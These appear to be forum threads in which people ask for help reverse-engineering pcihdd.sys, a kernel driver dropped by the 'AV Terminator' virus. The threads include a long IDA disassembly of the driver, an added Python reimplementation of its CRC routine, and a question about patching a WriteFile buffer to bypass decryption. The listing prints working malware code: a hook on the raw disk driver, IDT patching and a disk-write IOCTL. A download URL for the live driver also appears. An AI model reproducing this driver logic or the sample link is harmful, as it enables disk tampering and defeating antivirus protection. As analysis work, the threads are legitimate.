[Note] How can this code be modified so that the WriteFile parameter points at a specified region?
Let me restate my goal! I currently have a program, say a.exe; while running, a.exe calls the code above to perform a write. The write target is another data file, say b.dat; the content written is a memory block that a.exe allocates before the WriteFile call, its size being the size given in the WriteFile parameters, and its contents are produced by reading a specified data section of itself and running it through a series of decryption steps. My goal is to bypass that decryption part by changing the buffer pointer in WriteFile to point at content I have prepared. That is also where my question lies: how should I organize this content to be written? My current idea is to use a PE tool to add a zero-filled field of the size I want to write to the program's data section, fill it with the data I have prepared, and then hand the pointer to my added content directly to the WriteFile function. I don't know whether this will work. Experts, please enlighten me!
[Help] How do I trace a .sys driver file? Experts, please give me some pointers!
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
INIT segment para public 'CODE' use32
assume cs:INIT
;org 400CF0h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
        dd 0D18h, 2 dup(0)
        dd 0E7Ah, 840h, 5 dup(0)
        dd 0D54h, 0D68h, 0D80h, 0DA0h, 0DB6h, 0DCAh
        dd 0DE6h, 0DFEh, 0E10h, 0E28h, 0E3Ah, 0E4Eh
        dd 0E5Ch, 0E6Eh, 0
        db 61h ; a
        db 3, 52h, 74h
s_Linitansistri db 'lInitAnsiString',0
        db 50h ; P
        db 3, 52h, 74h
s_Lfreeunicodes db 'lFreeUnicodeString',0
        align 10h
        db 0FAh ; ú
        db 2, 52h, 74h
s_Lansistringto db 'lAnsiStringToUnicodeString',0
        align 10h
        db 0ABh ; «
        db 2, 4Fh, 62h
s_Dereferenceob db 'DereferenceObject',0
        dw 245h
s_Mmisaddressva db 'MmIsAddressValid',0
        align 2
        dw 13Dh
s_Iogetdeviceob db 'IoGetDeviceObjectPointer',0
        align 2
        dw 127h
s_Iodeletesymbo db 'IoDeleteSymbolicLink',0
        align 2
        dw 125h
s_Iodeletedevic db 'IoDeleteDevice',0
        align 10h
        db 21h ; !
        db 1, 49h, 6Fh
s_Createsymboli db 'CreateSymbolicLink',0
        align 4
        dd 6F49011Bh, 61657243h, 65446574h, 65636976h
        dd 1180000h
s_Iocompletereq db 'IoCompleteRequest',0
s_G db 'G',0
s_Exfreepool db 'ExFreePool',0
        align 4
s_7 db '7',0
s_Exallocatepoo db 'ExAllocatePool',0
        align 2
s_- db '-',0
s_Dbgprint db 'DbgPrint',0
        align 2
s_Ntoskrnl_exe db 'ntoskrnl.exe',0
        align 10h
INIT ends
end start
[Help] How do I trace a .sys driver file? Experts, please give me some pointers!
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 400880h
; char s_DevicePhysica[]
s_DevicePhysica db '\Device\PhysicalHardDisk0',0
; char s_DosdevicesPhy[]
s_DosdevicesPhy db '\DosDevices\PhysicalHardDisk0',0
; char SourceString[]
SourceString db '\Device\Harddisk0\DR0',0
dword_4008CE dd 0
dword_4008D2 dd 0
dword_4008D6 dd 0
        db 3FCh dup(0) ; 1020 zero bytes, 4008DAh..400CD5h (the listing shows them as individual "db 0" lines)
dword_400CD6 dd 0
; PVOID P
P dd 0
; SIZE_T NumberOfBytes
NumberOfBytes dd 0
qword_400CE2 dq 3025000000000000h
        db 38h ; 8
        db 58h ; X
        db 0
        db 0
        db 0
        db 0
_data ends
; Section 4. (virtual address 00000CF0)
; Virtual size : 00000198 ( 408.)
; Section size in file : 000001A0 ( 416.)
; Offset to raw data for section: 00000CF0
; Flags E2000020: Text Discardable Executable Readable Writable
; Alignment : default
[Help] How do I trace a .sys driver file? Experts, please give me some pointers!
; Attributes: bp-based frame
sub_40064D proc near
SourceString= STRING ptr -10h
UnicodeString= UNICODE_STRING ptr -8
arg_0= dword ptr 8
        push ebp
        mov ebp, esp
        add esp, 0FFFFFFF0h
        push edi
        push esi
        push ebx
        pusha
        cmp P, 0
        jz short loc_40066B
        push P ; P
        call ExFreePool
loc_40066B:
        cmp [ebp+arg_0], 0
        jz short loc_4006B7
        push offset s_DosdevicesPhy ; "\\DosDevices\\PhysicalHardDisk0"
        lea eax, [ebp+SourceString]
        push eax ; DestinationString
        call RtlInitAnsiString
        push 1 ; AllocateDestinationString
        lea eax, [ebp+SourceString]
        push eax ; SourceString
        lea eax, [ebp+UnicodeString]
        push eax ; DestinationString
        call RtlAnsiStringToUnicodeString
        lea eax, [ebp+UnicodeString]
        push eax ; SymbolicLinkName
        call IoDeleteSymbolicLink
        lea eax, [ebp+UnicodeString]
        push eax ; UnicodeString
        call RtlFreeUnicodeString
        mov edi, [ebp+arg_0]
        mov esi, [edi+4]
        jmp short loc_4006B3
loc_4006A8:
        mov edi, [esi+0Ch]
        push esi ; DeviceObject
        call IoDeleteDevice
        mov esi, edi
loc_4006B3:
        or esi, esi
        jnz short loc_4006A8
loc_4006B7:
        popa
        pop ebx
        pop esi
        pop edi
        leave
        retn 4
sub_40064D endp

; Attributes: bp-based frame
; int __stdcall start(PDRIVER_OBJECT DriverObject,int)
public start
start proc near
var_20= dword ptr -20h
SourceString= STRING ptr -1Ch
DeviceObject= dword ptr -14h
SymbolicLinkName= UNICODE_STRING ptr -10h
UnicodeString= UNICODE_STRING ptr -8
DriverObject= dword ptr 8
        push ebp
        mov ebp, esp
        add esp, 0FFFFFFE0h
        push edi
        push esi
        push ebx
        pusha
        nop
        nop
        call sub_4004B7
        call sub_400451
        or eax, eax
        jz short loc_40071F
        mov ecx, eax
        lea eax, [ebp+var_20]
        push eax
        push 3E8h
        push 3E8h
        push ecx
        call sub_4003B7
        or eax, eax
        jz short loc_40071F
        mov NumberOfBytes, eax
        push NumberOfBytes ; NumberOfBytes
        push 0 ; PoolType
        call ExAllocatePool
        mov P, eax
        jmp short $+2
        mov edi, P
        mov esi, [ebp+var_20]
        mov ecx, NumberOfBytes
        rep movsb
        jmp short loc_40072A
loc_40071F:
        popa
        xor eax, eax
        dec eax
        pop ebx
        pop esi
        pop edi
        leave
        retn 8
loc_40072A:
        jmp short $+2
        mov eax, [ebp+DriverObject]
        mov dword ptr [eax+34h], offset sub_40064D
        lea edi, [eax+38h]
        lea eax, sub_400518
        mov [edi], eax
        mov [edi+8], eax
        mov [edi+38h], eax
        push offset s_DevicePhysica ; "\\Device\\PhysicalHardDisk0"
        lea eax, [ebp+SourceString]
        push eax ; DestinationString
        call RtlInitAnsiString
        push 1 ; AllocateDestinationString
        lea eax, [ebp+SourceString]
        push eax ; SourceString
        lea eax, [ebp+UnicodeString]
        push eax ; DestinationString
        call RtlAnsiStringToUnicodeString
        push offset s_DosdevicesPhy ; "\\DosDevices\\PhysicalHardDisk0"
        lea eax, [ebp+SourceString]
        push eax ; DestinationString
        call RtlInitAnsiString
        push 1 ; AllocateDestinationString
        lea eax, [ebp+SourceString]
        push eax ; SourceString
        lea eax, [ebp+SymbolicLinkName]
        push eax ; DestinationString
        call RtlAnsiStringToUnicodeString
        lea eax, [ebp+DeviceObject]
        push eax ; DeviceObject
        push 0 ; Exclusive
        push 0 ; DeviceCharacteristics
        push 15h ; DeviceType
        lea eax, [ebp+UnicodeString]
        push eax ; DeviceName
        push 0 ; DeviceExtensionSize
        push [ebp+DriverObject] ; DriverObject
        call IoCreateDevice
        or eax, eax
        jz short loc_40079F
        jmp short loc_4007C9
loc_40079F:
        lea eax, [ebp+UnicodeString]
        push eax ; DeviceName
        lea eax, [ebp+SymbolicLinkName]
        push eax ; SymbolicLinkName
        call IoCreateSymbolicLink
        or eax, eax
        jz short loc_4007C9
        mov edi, [ebp+DriverObject]
        mov esi, [edi+4]
        jmp short loc_4007C3
loc_4007B8:
        mov edi, [esi+0Ch]
        push esi ; DeviceObject
        call IoDeleteDevice
        mov esi, edi
loc_4007C3:
        or esi, esi
        jnz short loc_4007B8
        jmp short $+2
loc_4007C9:
        lea eax, [ebp+UnicodeString]
        push eax ; UnicodeString
        call RtlFreeUnicodeString
        lea eax, [ebp+SymbolicLinkName]
        push eax ; UnicodeString
        call RtlFreeUnicodeString
        popa
        xor eax, eax
        pop ebx
        pop esi
        pop edi
        leave
        retn 8
start endp
        align 2
; [00000006 BYTES: COLLAPSED FUNCTION RtlInitAnsiString. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION RtlFreeUnicodeString. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION RtlAnsiStringToUnicodeString. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION ObDereferenceObject. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION MmIsAddressValid. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION IoGetDeviceObjectPointer. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION IoDeleteSymbolicLink. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION IoDeleteDevice. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION IoCreateSymbolicLink. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION IoCreateDevice. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION IoCompleteRequest. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION ExFreePool. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION ExAllocatePool. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION DbgPrint. PRESS KEYPAD "+" TO EXPAND]
        align 10h
_text ends
; Section 2. (virtual address 00000840)
; Virtual size : 0000003C ( 60.)
; Section size in file : 00000040 ( 64.)
; Offset to raw data for section: 00000840
; Flags 48000040: Data Not pageable Readable
; Alignment : default
;
; Imports from ntoskrnl.exe
;
; Segment type: Externs
; _idata
; void __stdcall RtlInitAnsiString(PANSI_STRING DestinationString,PCSZ SourceString)
extrn __imp_RtlInitAnsiString:dword
; void __stdcall RtlFreeUnicodeString(PUNICODE_STRING UnicodeString)
extrn __imp_RtlFreeUnicodeString:dword
; NTSTATUS __stdcall RtlAnsiStringToUnicodeString(PUNICODE_STRING DestinationString,PANSI_STRING SourceString,BOOLEAN AllocateDestinationString)
extrn __imp_RtlAnsiStringToUnicodeString:dword
extrn __imp_ObDereferenceObject:dword
; BOOLEAN __stdcall MmIsAddressValid(PVOID VirtualAddress)
extrn __imp_MmIsAddressValid:dword
; NTSTATUS __stdcall IoGetDeviceObjectPointer(PUNICODE_STRING ObjectName,ACCESS_MASK DesiredAccess,PFILE_OBJECT *FileObject,PDEVICE_OBJECT *DeviceObject)
extrn __imp_IoGetDeviceObjectPointer:dword
; NTSTATUS __stdcall IoDeleteSymbolicLink(PUNICODE_STRING SymbolicLinkName)
extrn __imp_IoDeleteSymbolicLink:dword
; void __stdcall IoDeleteDevice(PDEVICE_OBJECT DeviceObject)
extrn __imp_IoDeleteDevice:dword
; NTSTATUS __stdcall IoCreateSymbolicLink(PUNICODE_STRING SymbolicLinkName,PUNICODE_STRING DeviceName)
extrn __imp_IoCreateSymbolicLink:dword
; NTSTATUS __stdcall IoCreateDevice(PDRIVER_OBJECT DriverObject,ULONG DeviceExtensionSize,PUNICODE_STRING DeviceName,ULONG DeviceType,ULONG DeviceCharacteristics,BOOLEAN Exclusive,PDEVICE_OBJECT *DeviceObject)
extrn __imp_IoCreateDevice:dword
extrn __imp_IoCompleteRequest:dword
; void __stdcall ExFreePool(PVOID P)
extrn __imp_ExFreePool:dword
; PVOID __stdcall ExAllocatePool(POOL_TYPE PoolType,SIZE_T NumberOfBytes)
extrn __imp_ExAllocatePool:dword
; ULONG DbgPrint(PCH Format,...)
extrn __imp_DbgPrint:dword
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 40087Ch
        align 10h
_rdata ends
; Section 3. (virtual address 00000880)
; Virtual size : 0000046D ( 1133.)
; Section size in file : 00000470 ( 1136.)
; Offset to raw data for section: 00000880
; Flags C8000040: Data Not pageable Readable Writable
; Alignment : default
[Help] How do I trace a .sys driver file? Experts, please give me some pointers!
; Attributes: bp-based frame
sub_4003B7 proc near
var_8= dword ptr -8
var_4= dword ptr -4
arg_0= dword ptr 8
arg_4= dword ptr 0Ch
arg_8= dword ptr 10h
arg_C= dword ptr 14h
        push ebp
        mov ebp, esp
        add esp, 0FFFFFBF8h
        pusha
        xor eax, eax
        mov [ebp+var_4], eax
        mov edi, [ebp+arg_0]
        mov edi, [edi+3Ch]
        add edi, [ebp+arg_0]
        mov ecx, [edi+8Ch]
        or ecx, ecx
        jz short loc_400449
        mov eax, [edi+88h]
        add eax, [ebp+arg_0]
        mov [ebp+var_8], eax
        push eax ; VirtualAddress
        call MmIsAddressValid
        or eax, eax
        jnz short loc_4003F1
        jmp short loc_400449
loc_4003F1:
        mov esi, [ebp+var_8]
        mov cx, [esi+0Ch]
        add cx, [esi+0Eh]
        movzx ecx, cx
        add esi, 10h
        jmp short loc_400444
loc_400404:
        push ecx
        mov ebx, [esi+4]
        test ebx, 80000000h
        jz short loc_40043F
        and ebx, 7FFFFFFFh
        add ebx, [ebp+var_8]
        mov eax, [esi]
        test eax, 80000000h
        jnz short loc_40043F
        cmp eax, [ebp+arg_8]
        jnz short loc_40043F
        push [ebp+arg_C]
        push [ebp+arg_4]
        push ebx
        push [ebp+var_8]
        push [ebp+arg_0]
        call sub_400346
        mov [ebp+var_4], eax
        pop ecx
        jmp short loc_400449
loc_40043F:
        add esi, 8
        pop ecx
        dec ecx
loc_400444:
        cmp ecx, 0
        ja short loc_400404
loc_400449:
        popa
        mov eax, [ebp+var_4]
        leave
        retn 10h
sub_4003B7 endp

; Attributes: bp-based frame
sub_400451 proc near
var_4= dword ptr -4
        push ebp
        mov ebp, esp
        add esp, 0FFFFFFFCh
        pusha
        mov [ebp+var_4], 0
loc_40045F:
        lea ebx, loc_40045F
        and ebx, 0FFFFFC00h
loc_40046B: ; VirtualAddress
        push ebx
        call MmIsAddressValid
        or eax, eax
        jz short loc_4004B1
        cmp ebx, 80000000h
        jbe short loc_4004B1
        cmp word ptr [ebx], 5A4Dh
        jnz short loc_4004A9
        mov edi, ebx
        add edi, [ebx+3Ch]
        push edi ; VirtualAddress
        call MmIsAddressValid
        or eax, eax
        jz short loc_40049F
        cmp word ptr [edi], 4550h
        jnz short loc_40049F
        mov [ebp+var_4], ebx
        jmp short loc_4004B1
loc_40049F:
        sub ebx, 400h
        jmp short loc_40046B
        jmp short loc_4004B1
loc_4004A9:
        sub ebx, 400h
        jmp short loc_40046B
loc_4004B1:
        popa
        mov eax, [ebp+var_4]
        leave
        retn
sub_400451 endp

; Attributes: bp-based frame
sub_4004B7 proc near
var_4= dword ptr -4
        push ebp
        mov ebp, esp
        add esp, 0FFFFFFFCh
        pusha
        sidt qword_400CE2
        mov esi, dword ptr qword_400CE2+2
        mov eax, 9
        shl eax, 3
        add esi, eax
        movzx eax, word ptr [esi+6]
        shl eax, 10h
        mov ax, [esi]
        and eax, 0FF000000h
        mov [ebp+var_4], eax
        sub eax, eax
        jz short loc_400515
        mov esi, dword ptr qword_400CE2+2
        mov eax, 0Eh
        shl eax, 3
        add esi, eax
        movzx eax, word ptr [esi+6]
        shl eax, 10h
        mov ax, [esi]
        and eax, 0FF000000h
        cmp eax, [ebp+var_4]
        jz short loc_400515
        mov word ptr [esi+6], 0
loc_400515:
        popa
        leave
        retn
sub_4004B7 endp

; Attributes: bp-based frame
sub_400518 proc near
UnicodeString= UNICODE_STRING ptr -24h
SourceString= STRING ptr -1Ch
FileObject= dword ptr -8
DeviceObject= dword ptr -4
arg_4= dword ptr 0Ch
        push ebp
        mov ebp, esp
        add esp, 0FFFFFFDCh
        push edi
        push esi
        push ebx
        mov edi, [ebp+arg_4]
        mov dword ptr [edi+1Ch], 0
        mov dword ptr [edi+18h], 0
        mov esi, [edi+60h]
        movzx eax, byte ptr [esi]
        or eax, eax
        jnz short loc_4005B0
        jmp short $+2
        push offset SourceString ; "\\Device\\Harddisk0\\DR0"
        lea eax, [ebp+SourceString]
        push eax ; DestinationString
        call RtlInitAnsiString
        push 1 ; AllocateDestinationString
        lea eax, [ebp+SourceString]
        push eax ; SourceString
        lea eax, [ebp+UnicodeString]
        push eax ; DestinationString
        call RtlAnsiStringToUnicodeString
        xor eax, eax
        mov [ebp+FileObject], eax
        mov [ebp+DeviceObject], eax
        lea eax, [ebp+DeviceObject]
        push eax ; DeviceObject
        lea eax, [ebp+FileObject]
        push eax ; FileObject
        push 80h ; DesiredAccess
        lea eax, [ebp+UnicodeString]
        push eax ; ObjectName
        call IoGetDeviceObjectPointer
        mov eax, [ebp+FileObject]
        jmp short $+2
        mov eax, [eax+4]
        mov dword_4008CE, eax
        cmp dword ptr [eax+10h], 0
        jz short loc_40059A
        jmp short $+2
        mov ecx, [eax+10h]
        xchg ecx, dword_4008D2
        mov [eax+10h], ecx
loc_40059A:
        push [ebp+FileObject]
        call ObDereferenceObject
        lea eax, [ebp+UnicodeString]
        push eax ; UnicodeString
        call RtlFreeUnicodeString
        jmp loc_400637
loc_4005B0:
        cmp eax, 2
        jnz short loc_4005CD
        mov eax, dword_4008CE
        or eax, eax
        jz short loc_400637
        mov ecx, dword_4008D2
        or ecx, ecx
        jz short loc_4005CB
        mov [eax+10h], ecx
loc_4005CB:
        jmp short loc_400637
loc_4005CD:
        cmp eax, 0Eh
        jnz short loc_400637
        mov eax, [esi+0Ch]
        cmp eax, 0F0003C04h
        jnz short loc_400637
        call sub_4002B0
        mov ebx, [edi+0Ch]
        mov ecx, [esi+8]
        call sub_4002DA
        mov dword_400CD6, eax
        push dword_400CD6
        push (offset qword_400CE2+6) ; Format
        call DbgPrint
        add esp, 8
        mov eax, [esi+4]
        cmp eax, NumberOfBytes
        jbe short loc_400637
        mov edi, [edi+3Ch]
        mov esi, P
        mov ecx, NumberOfBytes
        shr ecx, 2
loc_400621:
        lodsd
        xor eax, dword_400CD6
        stosd
        dec ecx
        jnz short loc_400621
        mov ecx, NumberOfBytes
        and ecx, 3
        rep movsb
loc_400637:
        push 0
        push [ebp+arg_4]
        call IoCompleteRequest
        mov eax, 0
        pop ebx
        pop esi
        pop edi
        leave
        retn 8
sub_400518 endp
[Help] How do I trace a .sys driver file? Experts, please give me some pointers!
This AV Terminator virus does its damage through this pcihdd.sys driver. Below is the code disassembled by IDA:

; This file is generated by The Interactive Disassembler (IDA)
; Copyright (c) 2006 by DataRescue sa/nv, <ida@datarescue.com>
; Licensed to: Paul Ashton - Blue Lane Technologies (1-user Advanced 03/2006)
;
; Input MD5 : 289345E696BBDE6C2C6ABA2D5E506D23
; File Name : D:\1\pcihdd.sys
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 000002B0)
; Virtual size : 0000058A ( 1418.)
; Section size in file : 00000590 ( 1424.)
; Offset to raw data for section: 000002B0
; Flags 68000020: Text Not pageable Executable Readable
; Alignment : default
.686p
.mmx
.model flat
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 4002B0h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
sub_4002B0 proc near
        jmp short $+2
        mov ecx, 100h
        mov edx, 0CCECC9B1h
loc_4002BC:
        lea eax, [ecx-1]
        push ecx
        mov ecx, 8
loc_4002C5:
        shr eax, 1
        jnb short loc_4002CB
        xor eax, edx
loc_4002CB:
        dec ecx
        jnz short loc_4002C5
        pop ecx
        mov dword_4008D2[ecx*4], eax
        dec ecx
        jnz short loc_4002BC
        retn
sub_4002B0 endp

sub_4002DA proc near
        jmp short $+2
        mov eax, 0FFFFFFFFh
        or ebx, ebx
        jz short loc_4002FA
loc_4002E5:
        mov dl, [ebx]
        xor dl, al
        movzx edx, dl
        shr eax, 8
        xor eax, dword_4008D6[edx*4]
        inc ebx
        dec ecx
        jnz short loc_4002E5
loc_4002FA:
        not eax
        retn
sub_4002DA endp

; Attributes: bp-based frame
sub_4002FD proc near
var_4= dword ptr -4
arg_0= dword ptr 8
arg_4= dword ptr 0Ch
arg_8= dword ptr 10h
arg_C= dword ptr 14h
        push ebp
        mov ebp, esp
        add esp, 0FFFFFBFCh
        pusha
        xor eax, eax
        mov [ebp+var_4], eax
        mov esi, [ebp+arg_8]
        mov cx, [esi+0Ch]
        add cx, [esi+0Eh]
        movzx ecx, cx
        add esi, 10h
        cmp ecx, 0
        jbe short loc_40033E
        mov ebx, [esi+4]
        and ebx, 7FFFFFFFh
        add ebx, [ebp+arg_4]
        mov eax, [ebx]
        add eax, [ebp+arg_0]
        mov ecx, [ebp+arg_C]
        mov [ecx], eax
        mov ecx, [ebx+4]
        mov [ebp+var_4], ecx
loc_40033E:
        popa
        mov eax, [ebp+var_4]
        leave
        retn 10h
sub_4002FD endp

; Attributes: bp-based frame
sub_400346 proc near
var_4= dword ptr -4
arg_0= dword ptr 8
arg_4= dword ptr 0Ch
arg_8= dword ptr 10h
arg_C= dword ptr 14h
arg_10= dword ptr 18h
        push ebp
        mov ebp, esp
        add esp, 0FFFFFBFCh
        pusha
        xor eax, eax
        mov [ebp+var_4], eax
        mov esi, [ebp+arg_8]
        mov cx, [esi+0Ch]
        add cx, [esi+0Eh]
        movzx ecx, cx
        add esi, 10h
        jmp short loc_4003AA
loc_400368:
        push ecx
        mov ebx, [esi+4]
        test ebx, 80000000h
        jz short loc_4003A5
        and ebx, 7FFFFFFFh
        add ebx, [ebp+arg_4]
        mov edx, [esi]
        test edx, 80000000h
        jnz short loc_4003A5
        cmp edx, [ebp+arg_C]
        jnz short loc_4003A5
        push [ebp+arg_10]
        push ebx
        push [ebp+arg_4]
        push [ebp+arg_0]
        call sub_4002FD
        mov [ebp+var_4], eax
        or eax, eax
        jz short loc_4003A5
        pop ecx
        jmp short loc_4003AF
loc_4003A5:
        add esi, 8
        pop ecx
        dec ecx
loc_4003AA:
        cmp ecx, 0
        ja short loc_400368
loc_4003AF:
        popa
        mov eax, [ebp+var_4]
        leave
        retn 14h
sub_400346 endp
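For anyone working through the listing above, the two small routines sub_4002B0 and sub_4002DA are the part worth reproducing in a higher-level language first: sub_4002B0 fills a 256-entry table at dword_4008D6 from the reflected polynomial 0CCECC9B1h (eight shift-and-conditional-xor rounds per entry), and sub_4002DA runs a byte-wise reflected CRC-32 over a buffer (initial value 0FFFFFFFFh, final NOT) using that table. In sub_400518 the result is stored in dword_400CD6 and used as the dword XOR key at loc_400621, so being able to recompute it is what lets an analyst check a sample offline. The Python below is an added example written from the listing; it is not the poster's code and not the driver's code. The polynomial, table indexing and loop shape come from the disassembly; the sample input is constructed.

```python
"""Reimplementation of sub_4002B0 / sub_4002DA from the pcihdd.sys listing.

Added example for analysis and verification; the constants and loop shape are
read from the IDA output above, the SAMPLE buffer is constructed.
"""

POLY = 0xCCECC9B1          # mov edx, 0CCECC9B1h in sub_4002B0
MASK = 0xFFFFFFFF


def build_table():
    """sub_4002B0: table[i] = i shifted right 8 times, xor POLY on each carry-out.

    The listing counts ecx from 100h down to 1 with eax = ecx - 1 and stores
    at dword_4008D2[ecx*4], i.e. dword_4008D6 + 4*i; the order does not
    matter for the result, so this builds entries 0..255 ascending.
    """
    table = [0] * 256
    for i in range(256):
        crc = i
        for _ in range(8):           # mov ecx, 8 / shr eax, 1 / jnb / xor eax, edx
            carry = crc & 1
            crc >>= 1
            if carry:
                crc ^= POLY
        table[i] = crc
    return table


def checksum(data, table=None):
    """sub_4002DA: reflected CRC over `data` with the table from build_table().

    ebx is the buffer pointer and ecx the byte count; a NULL buffer skips the
    loop and returns NOT 0FFFFFFFFh == 0, modelled here as None / b"".
    """
    if table is None:
        table = build_table()
    crc = 0xFFFFFFFF                      # mov eax, 0FFFFFFFFh
    for b in (data or b""):
        idx = (b ^ crc) & 0xFF            # mov dl, [ebx] / xor dl, al / movzx edx, dl
        crc = (crc >> 8) ^ table[idx]     # shr eax, 8 / xor eax, dword_4008D6[edx*4]
    return (~crc) & MASK                  # not eax


# Constructed sample. In the driver the buffer is the input of IOCTL 0F0003C04h
# ([edi+0Ch] with the length from [esi+8]); the value ends up in dword_400CD6.
SAMPLE = b"constructed sample input"

if __name__ == "__main__":
    t = build_table()
    print("table[0x80] = %08X" % t[0x80])        # single carry-out: equals POLY
    print("checksum    = %08X" % checksum(SAMPLE, t))
```

Two entries make a quick sanity check against the listing without running the sample: entry 0 is zero (eax starts at ecx-1 = 0), and entry 80h is exactly the polynomial, because the single set bit is shifted out on the last of the eight rounds and xored in once.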
[Discussion] The new packer used by the AV Terminator virus; two days and no clue, please everyone take a look and help analyze it!
The virus ultimately generates a pcihdd.sys file and registers it as a service, and the service then writes pcihdd.sys into the userinit.exe file. I have now cracked my way into pcihdd.sys, but I know nothing about .sys drivers; could someone give me a pointer? Below is the download address of the driver file generated by the virus: http://www.vupig.com.cn/disk.sys